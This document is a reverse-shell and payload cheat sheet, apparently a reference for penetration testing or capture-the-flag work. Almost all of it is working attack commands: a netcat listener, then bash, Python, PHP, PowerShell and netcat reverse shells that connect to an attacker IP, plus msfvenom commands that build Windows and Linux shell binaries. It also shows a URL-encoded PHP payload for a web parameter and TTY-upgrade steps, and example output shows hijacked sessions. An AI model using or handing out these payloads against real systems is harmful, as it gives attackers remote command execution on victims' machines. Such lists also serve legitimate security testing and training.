REVERSE SHELLS & PAYLOADS
Start listener
Always set up first — Use port 443 (less likely filtered)
nc -nlvp 443
or: rlwrap nc -nlvp 443
Example Output
nc -nlvp 443
Listening on 0.0.0.0 443
OR better:
rlwrap nc -nlvp 443
(rlwrap gives arrow key history in shell)
Bash reverse shell
Linux/Mac — Most reliable on Linux
bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1
Example Output
bash -i >& /dev/tcp/10.10.14.2/443 0>&1
Attacker:
connect to [10.10.14.2] from [10.10.10.5] 48234
bash-4.4$ whoami
www-data
Python reverse shell
If Python is installed — Very common on Linux
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Example Output
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Attacker: $ whoami
www-data
PHP reverse shell (one-liner)
In command injection or upload — Or use pentestmonkey full shell
php -r '$sock=fsockopen("ATTACKER_IP",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Example Output
php -r '$sock=fsockopen("10.10.14.2",443);exec("/bin/sh -i <&3 >&3 2>&3");'
OR in a web parameter:
cmd=php+-r+'$s=fsockopen("10.10.14.2",443);exec("/bin/sh+-i+<&3+>&3+2>&3");'
Attacker:
$ whoami
www-data
(Inline PHP shell, no file upload needed)
PowerShell reverse shell
Windows targets — Or use Nishang Invoke-PowerShellTcp
powershell -e <base64_payload>
Generate: msfvenom -p cmd/windows/reverse_powershell LHOST=ATTACKER_IP LPORT=443
Example Output
powershell -e JABjAGwAaQBlAG4A...(base64)
Attacker:
connect from 10.10.10.5
PS C:\Users\admin> whoami
corp\admin
nc reverse shell
Netcat — Try both -e and mkfifo versions
nc -e /bin/sh ATTACKER_IP 443
or: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 443 >/tmp/f
Example Output
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 443 >/tmp/f
Attacker:
$ whoami
www-data
(Use this version when nc -e isn't available)
msfvenom payloads
Generate binary payloads — For upload + execute scenarios
Windows: msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f exe -o shell.exe
Linux: msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f elf -o shell.elf
Example Output
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -o shell.exe
Payload size: 460 bytes
Saved as: shell.exe
Transfer to target, execute, catch with nc
Upgrade to TTY shell
After getting basic shell — Full interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
Example Output
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@target:/var/www$ ^Z
[1]+ Stopped
$ stty raw -echo; fg
www-data@target:/var/www$ export TERM=xterm
(Now have full interactive shell with tab complete)
revshells.com
Generate any reverse shell — Bookmark this
https://www.revshells.com/
Example Output
Visit https://www.revshells.com/
Select: Bash -i, Python3, PHP, PowerShell #3
Enter: IP and Port
Copy generated payload
(Auto-generates reverse shells for any language)